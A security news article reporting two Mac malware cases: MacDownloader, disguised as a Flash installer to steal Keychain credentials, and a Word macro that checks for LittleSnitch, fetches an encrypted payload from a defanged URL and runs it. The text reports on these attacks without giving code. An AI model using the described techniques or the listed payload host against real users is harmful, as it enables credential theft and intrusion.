In the past week, two relatively crude threats to Mac users have surfaced. The malware targets Apple’s operating system, now called MacOS.
The first piece of malware, analyzed by researchers Claudio Guarnieri and Collin Anderson and dubbed MacDownloader, was used as part of an attack that targeted the U.S. defense and aerospace industries. The attackers created a fraudulent website that appeared to come from United Technologies, a U.S. aerospace firm.
MacDownloader looks, to users, like an antivirus adware removal tool, as well as an Adobe Flash installer. But its goal is to steal user credentials from Keychain.
Researchers believe that, while the malware is currently in a rather straightforward exfiltration tool, it may be in the early stages of becoming a platform from which to launch different types of attacks.
“Based on observations on infrastructure, and the state of the code, we believe these incidents represent the first attempts to deploy the agent, and features such as persistence do not appear to work. Instead, MacDownloader is a simple exfiltration agent, with broader ambitions,” the team wrote.
The bogus website doesn’t just target Mac users. If Windows users visit the site, they are targeted with malware designed for their operating system.
This isn’t the only Mac malware revealed this week. Ars Technica security editor Dan Goodin has a good write-up on a Microsoft Word macro attack — that’s right, a good old-fashioned document macro like those that have targeted Windows users for roughly two decades.
From Goodin’s story, Mac malware is still crude, but it’s slowly catching up to its Windows rivals:
The attack was found in a Word file titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.” When Mac users open the document in a Word application configured to allow macros and ignore a warning, an embedded macro automatically:
- Checks to make sure the LittleSnitch security firewall isn’t running
- Downloads an encrypted payload from hxxps://www.securitychecking.org:443/index.asp
- Decrypts the payload using a hard-coded key and
- Executes the payload
The code contained in the macro is written in the Python programming language. It was taken almost verbatim from EmPyre, an open-source exploit framework for Macs.
Goodin adds that because the system serving the malware was no longer active at the time of discovery, it’s not possible to know exactly what the malicious software did.
That’s not very reassuring, and both of these incidents point to the possibility that malware targeting Mac operating systems is picking up stride. One thing is clear, however — malware authors will never bore of trying to trick end-users into clicking on something dangerous.
So Web surfer beware: Don’t click anything unless reasonably certain it’s safe to do so.